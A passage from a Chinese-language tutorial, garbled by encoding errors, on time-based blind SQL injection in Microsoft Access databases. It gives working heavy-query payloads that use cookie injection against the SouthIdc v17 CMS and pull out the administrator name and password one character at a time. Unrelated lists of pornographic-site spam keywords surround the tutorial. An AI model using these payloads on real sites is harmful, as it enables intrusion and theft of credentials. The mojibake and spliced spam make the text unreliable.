欧美三区四区_av先锋影音资源站_亚洲第一论坛sis_影音先锋2020色资源网_亚洲精品社区_在线免费观看av网站_国产一区二区伦理_亚洲欧美视频一区二区_99视频精品全部免费在线_精精国产xxxx视频在线

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄_Access數(shù)據(jù)庫(kù)教程

編輯Tag賺U幣
教程Tag:暫無Tag,歡迎添加,賺取U幣!

推薦:關(guān)閉Access2010數(shù)據(jù)庫(kù)默認(rèn)輸入法的方法
1.打開Access2010,點(diǎn)擊開始選項(xiàng)卡,選擇選項(xiàng) 2.在打開的Access選項(xiàng)窗口中,在左邊的菜單中選擇客戶端設(shè)置,在右邊的窗口中將數(shù)據(jù)表IME控件勾選,確定即可,相關(guān)截圖如下所示:

   Access是微軟把數(shù)據(jù)庫(kù)引擎的圖形用戶界面和軟件開發(fā)工具結(jié)合在一起的一個(gè)數(shù)據(jù)庫(kù)管理系統(tǒng)。本文我們來看看Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄。

  概述

  眾所周知,access數(shù)據(jù)庫(kù)是不支持基于時(shí)間的盲注方式,但是我們可以利用access的系統(tǒng)表MSysAccessObjects,通過多負(fù)荷查詢(Heavy Queries)的方式實(shí)現(xiàn)。

  初步探究

  我們以SouthIdcv17數(shù)據(jù)庫(kù)為例

  執(zhí)行 select * from Southidc_About ,返回結(jié)果如下圖。

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄    模板無憂

  如何實(shí)現(xiàn)time base injection 呢?我們就要利用這條語句

  SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12

  具體實(shí)現(xiàn)方式如下:

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

  Southidc_Admin)=97

  我們可以執(zhí)行一次,觀察效果。

  很明顯,經(jīng)歷了大約40s才返回結(jié)果

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

  當(dāng)我們執(zhí)行如下語句時(shí),也就是把最后的97改為96

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

  Southidc_Admin)=96

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

  很快就執(zhí)行完畢,沒有延時(shí)。

  很明顯,我們通過where條件后的

  (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0

  實(shí)現(xiàn)了延時(shí),但需要注意的是這里where后的條件是有順序的,實(shí)現(xiàn)延時(shí)的語句必須在

  1(select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97

  之前,為什么呢?實(shí)驗(yàn)得出的結(jié)論。

  實(shí)例實(shí)現(xiàn)

  在SouthIdc 17 中,有一處sql注入漏洞,但是常規(guī)的方法并不能成功利用漏洞。漏洞代碼如下:

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

  雖然程序把Post和Get的數(shù)據(jù)進(jìn)行了過濾,但是我們依舊我可以通過Cookie的提交方式進(jìn)行注入。

  好,我們實(shí)現(xiàn)一下注入利用。

  我們需要注入的語句為:

  select * from Southidc_"&request("Range")&"Sort where ViewFlag and ParentID="&ParentID&" order by ID asc

  通過提交cookie

  Range=DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image

  ParentID為程序上部傳進(jìn)的值,最終的語句為:

  1select * from Southidc_DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_imageSort where ViewFlag and ParentID=1

  我們可以在查詢器中看一下效果

  96時(shí),不延時(shí),如圖:

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

  97時(shí)延時(shí),效果如下圖:

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

  接下來,我們可以利用上述語句進(jìn)行exp的編寫,筆者這里用python

  核心代碼如下:

Access數(shù)據(jù)庫(kù)基于時(shí)間sql盲注的實(shí)現(xiàn)記錄

分享:IIS中利用重定向URL來防止Access數(shù)據(jù)庫(kù)被下載的方法
對(duì)于ASP+Access開發(fā)的網(wǎng)站,安全性最最讓人擔(dān)憂的就是Access數(shù)據(jù)庫(kù)可以隨意下載,當(dāng)然我們可以通過一些修改數(shù)據(jù)庫(kù)名稱的手段進(jìn)行盡量的防護(hù),但歸根結(jié)底是不徹底的。所以今天就來談?wù)勗贗IS中利用重定向URL來防止Access數(shù)據(jù)庫(kù)被下載的方法。 此方法需要你有IIS的管理權(quán)

來源:模板無憂//所屬分類:Access數(shù)據(jù)庫(kù)教程/更新時(shí)間:2015-02-10
相關(guān)Access數(shù)據(jù)庫(kù)教程
精品精品国产三级a∨在线| 高潮毛片无遮挡| 91久久国语露脸精品国产高跟| 香蕉视频国产精品| 亚洲午夜三级在线| 欧美最猛性xxxxx免费| 久久九九国产视频| 国产精品一区二区人人爽| 激情国产一区| 在线精品亚洲一区二区不卡| 国产欧美精品日韩精品| 亚洲欧洲国产视频| 写真福利精品福利在线观看| 精久久久久久久久久久| 亚洲福利视频在线| 亚洲欧洲国产日韩精品| 丰满少妇高潮久久三区| 免费久久久久久久久| **欧美大码日韩| 69久久夜色精品国产7777| 奇米影音第四色| 高h放荡受浪受bl| 男人操女人的视频在线观看欧美| 91精品国产福利在线观看| 欧美成人免费在线| 精品在线观看一区| 蜜桃国内精品久久久久软件9| 中文字幕欧美一区| 日本sm极度另类视频| 国产精品19p| 青青在线精品| 久久久久久久综合| 久久免费高清视频| 亚洲精品在线视频播放| 免费观看欧美大片| www..com久久爱| 久久色精品视频| 国产精品视频黄色| 亚洲最新无码中文字幕久久| 国产精品亚洲成人| www.色综合| 超碰在线97免费| 偷拍精品精品一区二区三区| gogogo免费视频观看亚洲一| 久久精品福利视频| 日本成人黄色网| 亚洲综合在线电影| 99视频精品在线| 欧美极品美女视频网站在线观看免费| 中文字幕66页| 国产精品第一国产精品| 国产亚洲一本大道中文在线| 午夜精品视频在线| 2一3sex性hd| 超碰精品在线观看| 一区二区三区91| 91青青草免费观看| 亚洲av鲁丝一区二区三区| 日韩一区二区在线免费| 欧美亚洲图片小说| 亚洲乱码国产乱码精品天美传媒| 波多野结衣视频在线看| 日韩高清不卡一区二区三区| 亚洲区一区二区| 成人黄色一区二区| 亚洲国产尤物| 国产精品美女久久久久aⅴ| 国产精品观看在线亚洲人成网| 日本精品在线观看视频| 日韩欧美精品| 91精品国模一区二区三区| 成年人黄色在线观看| av av片在线看| 成人免费视频一区二区| 2019av中文字幕| 国产黄色网址在线观看| 国内黄色精品| 欧美日韩不卡视频| a级片一区二区| 日韩中文字幕观看| 久久精品视频一区二区| 国产日韩欧美在线看| 久久国产波多野结衣| 欧美日韩精品免费观看视频完整| 精品国产乱码91久久久久久网站| 日本在线xxx| 超碰这里只有精品| 亚洲色图.com| 精品久久久久久中文字幕动漫 | y97精品国产97久久久久久| 亚洲va综合va国产va中文| 综合久久成人| 一本久道久久综合中文字幕| 亚洲国产精品一区二区第四页av| 国产免费黄色大片| 99国产精品99久久久久久| 日韩美女在线观看| 在线观看成人毛片| 性色一区二区| 欧美另类xxx| 中文字幕免费看| 91精品观看| 日韩激情av在线播放| 久久久久国产一区| 国产精品巨作av| 欧美老人xxxx18| 日本国产在线播放| 免费成人黄色网| 欧美日韩激情视频8区| 亚洲精品成人a8198a| 亚洲精品一区二区口爆| 国产欧美精品国产国产专区 | 国产精品 欧美激情| 国产精品久久国产愉拍| 精品国产一区二区三区四区在线观看| 国产香蕉精品视频| 欧美超碰在线| 亚洲精品一区二区在线| 久久无码人妻一区二区三区| 精品久久久久久久久久久下田| 日韩精品一区二区三区中文精品| 91国产精品视频在线观看| 丁香5月婷婷久久| 欧美区在线观看| 麻豆传传媒久久久爱| 伦理一区二区| 日韩亚洲电影在线| 美女在线视频一区二区| 九九免费精品视频在线观看| 精品国产区一区| 久久久久久久久久毛片| 欧美r级电影| 伊人激情综合网| 给我看免费高清在线观看| 欧美日韩四区| 不用播放器成人网| 很污很黄的网站| 美国毛片一区二区| 国产精品99久久久久久久久久久久| 国产第一页在线播放| 国产福利一区在线观看| 国产在线观看91精品一区| 精品国产xxx| 91色乱码一区二区三区| 国产精品一区二区欧美黑人喷潮水 | 国产性生活免费视频| 成人国产精品久久| 欧美日韩综合在线| wwww.国产| 日本欧美视频| 永久555www成人免费| 日韩中文字幕有码| 美日韩一区二区| 国产精品男人爽免费视频1| 亚洲第一网站在线观看| 91久色porny| 免费在线一区二区| 日韩av免费| 精品视频一区二区三区免费| 中文字幕 91| 久久在线电影| 久久成人一区二区| 欧美成人精品激情在线视频| 国产精品123| 欧美二区三区在线| 久久综合亚洲精品| 自拍偷拍亚洲| 欧美精品第1页| 久久精品国产露脸对白| 伊人成综合网| 久久久久久久久久国产| 日本一区二区网站| 2024国产精品视频| 欧美日韩一区二区视频在线观看| 快播电影网址老女人久久| 欧美三级蜜桃2在线观看| 久久人人爽av| 欧美日韩在线大尺度| 久久久久久亚洲精品| 国产情侣在线视频| 国产人成一区二区三区影院| 中文字幕成人一区| 97色成人综合网站| 亚洲人成电影在线播放| frxxee中国xxx麻豆hd| 国产成人鲁色资源国产91色综| 成人av免费看| 成人看片网站| 日韩一级片网址| 西西大胆午夜视频| 久久se这里有精品| 豆国产97在线| а√天堂资源国产精品| 日韩一本二本av| 亚洲第一页av| 国产在线精品免费| 久久久久欧美| 国产日韩欧美中文在线| 亚洲精品av在线| 长河落日免费高清观看| www.亚洲国产| 永久域名在线精品| 亚洲影院天堂中文av色| 久久精品国产亚洲| 成人午夜视频在线播放| 一区二区三区四区乱视频| 99蜜桃臀久久久欧美精品网站| 99精品一区| 日韩av电影手机在线| 国产女人18毛片水真多| 色哟哟一区二区在线观看| 51自拍视频在线观看| 久久亚洲不卡| 国产一区二区三区四区五区加勒比| 国产香蕉久久| 亚洲欧洲日韩国产| 免费无遮挡无码永久在线观看视频| 中文字幕第一页久久| 久久成人福利视频| 久久久久久久久99精品大| 国产91九色视频| 日本黄色三级视频| 日韩欧美国产一二三区| 一区二区三区在线播放视频| 久久久久久久久久久久久女国产乱| 黄色成人在线免费观看| 久久在线播放| 国产精品一二三在线| 日日夜夜天天综合| 亚洲精品97久久| 免费在线观看亚洲| 亚洲欧美日韩国产成人精品影院| 久久精品免费网站| 久久久777| 久久99精品久久久久久青青日本| youjizz亚洲| 久久97精品久久久久久久不卡| 中文字幕久久久久| 91久久一区二区| 日本高清www| 久久综合九色综合97婷婷女人| 久久久久久久久久久99| 尤物网精品视频| 91沈先生播放一区二区| 欧州一区二区三区| 日韩中文理论片| 91久久精品国产91性色69 | xxx在线播放| wwwwxxxxx欧美| 99蜜桃臀久久久欧美精品网站| 亚洲尤物在线| 裸体丰满少妇做受久久99精品| 精品国产18久久久久久洗澡| 九九热这里只有精品6| 国产日韩在线观看一区| 91精品国产一区二区人妖| 成人在线观看高清| 亚洲精品欧美二区三区中文字幕| 欧美视频亚洲图片| 国产成人精品影视| 日韩欧美精品免费| 国产农村妇女精品一区二区 | 亚洲澳门在线| 91免费看片在线| 97久久亚洲| 4k岛国日韩精品**专区| 免费观看欧美大片| 在线观看视频99| 97人妻精品一区二区三区视频 | 添女人荫蒂视频| 国产婷婷色一区二区三区四区| 日本熟妇人妻中出| 国产综合一区二区| 国产精品va在线观看无码| 亚洲少妇在线| 日韩精品电影网站| 亚洲一区欧美| 激情欧美一区二区三区中文字幕| 久久综合欧美| 91久久精品美女高潮| 东京久久高清| 国产精品极品美女在线观看免费 | 欧美亚洲视频一区二区| 欧美国产日韩电影| 欧美老女人在线视频| 免费亚洲电影| 久久久精品在线观看| 天堂av资源在线| 最近2019中文字幕第三页视频| 亚洲毛片欧洲毛片国产一品色| 精品一区二区亚洲| 国产精品久久久久毛片| 亚洲成成品网站| 中文字幕免费播放| 亚洲黄色有码视频| 91欧美日韩麻豆精品| 亚洲精品久久久久久久久久久久 | 亚洲综合20p| 99久久精品国产网站| 中文字幕成人在线视频| 91网站在线播放| 天堂在线精品视频| 国产丝袜在线精品| 女同性αv亚洲女同志| 国产女人18毛片水真多成人如厕| 亚洲最大视频网| 国产精品第五页| 免费观看av网站| 亚洲香蕉伊在人在线观| 最新黄色av网址| 日本韩国欧美在线| 国产污视频在线看| 欧美日韩aaaaa| 国产一区二区视频免费| 精品sm捆绑视频| 国产麻豆免费观看| 在线观看国产欧美| 亚洲 另类 春色 国产| 色在人av网站天堂精品| 欧美jizz18| 国产成人精品视频| 久久影院资源站| 亚洲综合一区二区不卡| 色综合久久网| 日韩视频专区| 国产午夜久久| 欧美日韩性生活片| 国产99久久久国产精品潘金| 久久精品国产露脸对白| 国产精品国产精品国产专区不片| 欧美多人猛交狂配| 狠狠色狠狠色综合日日小说| 久久久精品91| 日韩精品一区二区三区四区 | 欧美日本不卡视频| 欧美一区二区三区网站| 日韩av中文字幕在线播放| 超碰在线观看av| 九九视频直播综合网| 日韩精品视频一区二区三区| 国产日韩欧美另类| 99热在线成人| 中文字幕在线亚洲三区| 麻豆国产精品视频| 性chinese极品按摩| 国产精品天美传媒| 中文字幕91视频| 51午夜精品国产| 91中文字幕在线播放| 日韩亚洲综合在线| 999精品嫩草久久久久久99| 成人黄色av免费在线观看| 国产精品二区不卡| 欧美一级黄色录像片| 国产成人免费av在线| 91九色蝌蚪porny| 丰满岳妇乱一区二区三区| 成人毛片在线播放| 亚洲石原莉奈一区二区在线观看| 影视一区二区三区| 国产精品国内视频| 999精品视频| 麻豆传媒网站在线观看| 国产成人8x视频一区二区| 美女网站视频在线观看| 欧美色图在线视频| 男人天堂视频网| www国产精品视频| 青草伊人久久| 久久久久高清| 蜜臀av性久久久久av蜜臀妖精| 91亚洲免费视频| 亚洲国产成人av网| 亚洲第一在线播放| 综合网中文字幕| 综合伊人久久| 欧美精品欧美精品| 韩国成人在线视频| 农村末发育av片一区二区| 日韩欧美一区二区在线| 中文字幕欧美人妻精品| 九色成人免费视频| 国产一区二区区别| 强伦女教师2:伦理在线观看| 成人美女视频在线看| 亚洲欧洲久久久| 日韩一区二区三区视频在线| 香蕉久久国产av一区二区| 国产精品午夜视频| 激情综合在线| 久久久久久久片| 亚洲一区二区不卡免费| 国产伦精品一区二区三区视频网站| 久久人人爽人人爽人人片亚洲| 欧美亚洲国产日韩| 一区二区视频在线观看| 99久久亚洲一区二区三区青草| 中文字幕第69页| 亚洲激情视频在线| 久久久久久爱|